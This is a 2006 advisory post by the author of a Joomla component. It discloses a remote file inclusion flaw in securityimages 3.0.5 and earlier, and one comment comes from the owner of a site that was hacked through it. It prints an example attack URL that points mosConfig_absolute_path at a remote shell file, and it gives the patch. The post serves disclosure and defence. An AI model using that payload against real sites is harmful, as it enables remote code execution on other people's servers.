Security risk in securityimages Print E-mail
User Rating: / 0
PoorBest 
Tuesday, 01 August 2006 19:58


The webmaster of janwiersma.com sent me an email today
at 6:12AM , his server was hacked because of a bug in
securityimages. This bug allows a remote atacker to
execute commands via remote forceful include and
execute function on your server
and affect ALL version of securityimages <= 3.0.5

Here are all files which put your server at risk:
client.php, configinsert.php, lang.php, server.php

Example of attack:
http://web/components/com_securityimages/
configinsert.php?mosConfig_absolute_path=http://shell.txt
from http://securityreason.com/exploitalert/892
Secunia has also a report on it: http://secunia.com/product/11186/
In fact I forget to use that line in these files:
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
This avoid any requests to access directly this file. 

- upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR
- patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

Please also contact all Your friends which are using securityimages!

And for my other components?

Hashcash 1.2.X is also affected: http://secunia.com/product/11046/  and my patch is avalaible!

- upgrade to 1.2.2  (download at Joomla Forge or in my download sections) OR
- patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

JoomlaCloud is NOT affected





YOU ARE ALL URGE TO UPGRADE ASAP!

Tags See All Tags Add New Tag...

Please Enter New Tags Separated By Comma's
  Or Close

bug  joomla  securityimage3  upgrade 
Powered By Joomla Tags

Comments
Add New Search RSS
2 sites got hacked
Jan Wiersma (82.161.149.xxx) 2006-08-02 17:25:38

Yes.. janwiersma.com and sepp.nl got hacked by this bug

After the hack
i disabled SecurityImage but that does not work; if not upgrading to 3.0.6 then
you have to uninstall the component to be safe !

Finding out the hack entry
was easy: after the hack, i checked the Webalizer logs and saw this:

"Top
1 of 1 Total Search Strings: allinurl: com_securityimages"

People looking
(google-ing) for 'com_securityimages' ending up on my website ? That must be the
leak!

So a quick google on 'com_securityimages & exploid' gives the
answer:
http://securityreason.com/exploitalert/89
2[URL=http://securityreason.com/exploitalert/892
>http://securityreason.com/exploitalert/892[/URL >
Write comment
Name:
Email:
 
Title:
UBBCode:
[b] [i] [u] [url] [quote] [code] [img] 
 
:):grin;)8):p:roll:eek:upset:zzz:sigh:?:cry
:(:x
Please input the anti-spam code that you can read in the image.

3.20 Copyright (C) 2007 Alain Georgette / Copyright (C) 2006 Frantisek Hliva. All rights reserved."

Last Updated on Thursday, 17 August 2006 21:54
 


Another articles:

Powered By relatedArticle

Content View Hits : 3463826

Enter Amount: